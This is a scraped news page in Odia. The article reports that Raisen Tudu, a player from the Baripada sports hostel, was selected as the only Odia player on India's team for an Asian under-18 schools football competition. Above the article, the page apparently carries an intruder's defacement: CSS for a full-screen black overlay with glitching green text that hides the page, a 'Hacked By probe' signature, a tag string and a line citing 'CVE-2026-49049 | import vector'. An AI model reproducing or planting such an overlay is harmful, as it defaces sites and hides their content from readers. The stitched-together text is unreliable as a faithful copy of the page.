html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPNTKY4V9V
`58; Hacked By probe `68;
[ HXIMPntky4v9v ]
HXIMPntky4v9v
CVE-2026-49049 | import vector

ବାରିପଦା କ୍ରୀଡ଼ା ଛାତ୍ରାବାସରୁ ରାଇସେନ ଭାରତୀୟ ଦଳରେ ଏକମାତ୍ର ଓଡ଼ିଆ ଖେଳାଳୀ 

User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

୧୮ ବର୍ଷରୁ କମ୍ ଏସିୟ ବିଦ୍ୟାଳୟସ୍ତରୀୟ ଫୁଟବଲ ପ୍ରତିଯୋଗିତା

ବାରିପଦା(ଦିଲ୍ଲୀପ ମହାନ୍ତି )- ଚଳିତ ସେପ୍ଟେମ୍ବର ୨୦ରୁ ୩୦ ପର୍ଯ୍ୟନ୍ତ ଭାରତର ଆଗ୍ରାଠାରେ ଆରମ୍ଭ ହୋଇଥିବା ୪୬ତମ ଏସୀୟ ୧୮ ବର୍ଷରୁ କମ୍ ବିଦ୍ୟାଳୟ ସମୂହ ଫୁଟବଲ ପ୍ରତିଯୋଗିତାରେ ଓଡ଼ିଶାରୁ ଏକମାତ୍ର ଓଡ଼ିଆ ଖେଳାଳୀ ଭାବେ ବାରିପଦା  କ୍ରୀଡ଼ାଛାତ୍ରାବାସର ଅନ୍ତେବାସୀ ରାଇସେନ ଟୁଡ଼ୁ ମନୋନୀତ ହୋଇଛନ୍ତି । ଉକ୍ତ ପ୍ରତିଯୋଗିତାରେ ଭାରତୀୟ ଦଳରେ ପ୍ରତିନିଧିତ୍ୱ କରିବା ନିମନ୍ତେ ଗତ ଅଗଷ୍ଟ ୨୦ରେ ଉତ୍ତରାଞ୍ଚଳ ରାଜ୍ୟ ରୁଦ୍ରପୁର ଜିଲ୍ଲା ଆମେଠୀ ପବ୍ଲିକ ସ୍କୁଲ ପରିସରରେ ଆୟୋଜିତ ଚୟନ ଓ ତାଲିମ ଶିବିରରେ ଯୋଗ ଦେଇ ଏହି ସୌଭାଗ୍ୟର ଅଧିକାରୀ ହୋଇପାରିଛନ୍ତି । ସୂଚନାଯୋଗ୍ୟଯେ, ଶ୍ରୀଟୁଡ଼ୁ ମୟୂରଭଞ୍ଜ ଜିଲ୍ଲା ତିରିଂ ବ୍ଲକ ଅଧୀନରେ ଥିବା ବଡ଼ନାରିଣି ଗ୍ରାମର ରଘୁନାଥ ଟୁଡ଼ୁ ଓ ବାଙ୍ଗି ଟୁଡ଼ୁଙ୍କ ପୁତ୍ର ଅଟନ୍ତି । ବାଲ୍ୟକାଳରୁ ଫୁଟବଳ ଖେଳର ନିଶା ତାଙ୍କୁ ପ୍ରଥମେ ରାଜ୍ୟ କ୍ରୀଡ଼ା ଓ ଯୁବ ସେବା ବିଭାଗ ଚୟନ ପ୍ରକ୍ରିୟାରେ ସାମିଲ କରାଇ ବାରିପଦା କ୍ରୀଡ଼ାଛାତ୍ରାବାସରେ ଯୋଗ ଦେବାର ସୁଯୋଗ ଦେଇଥିଲା । କ୍ରୀଡ଼ାଛାତ୍ରାବାସରେ  ପ୍ରଶିକ୍ଷକ ଅବନୀ ମୋହନ ମହାନ୍ତିଙ୍କ ପ୍ରଶିକ୍ଷଣରେ ନିଜର କ୍ରୀଡ଼ା ଦକ୍ଷତା ପ୍ରଦର୍ଶନ ମାଧ୍ୟମରେ ସମସ୍ତଙ୍କ ନଜରକୁ ଆସିପାରିଥିଲେ । ଶ୍ରୀଟୁଡ଼ୁ ଭାରତୀୟ ଦଳରେ ଏକମାତ୍ର ଓଡ଼ିଆ ଖେଳାଳୀ ଭାବେ ପ୍ରତିନିଧିତ୍ୱ କରିବାର ସୁଯୋଗ ପାଇଥିବାରୁ  ମୟୂରଭଞ୍ଜ ଜିଲ୍ଲାପାଳ ବିନୀତ ଭରଦ୍ୱାଜ, ଅତିରିକ୍ତ ଜିଲ୍ଲାପାଳ ଗଙ୍ଗାଧର ନାୟକ ପ୍ରମୁଖ ତାଙ୍କୁ ଶୁଭେଚ୍ଛା ଜଣାଇବା ସଂଗେସଂଗେ ଉଜ୍ଜ୍ୱଳ ଭବିଷ୍ୟତ କାମନା କରିଛନ୍ତି । 

 

0
0
0
s2sdefault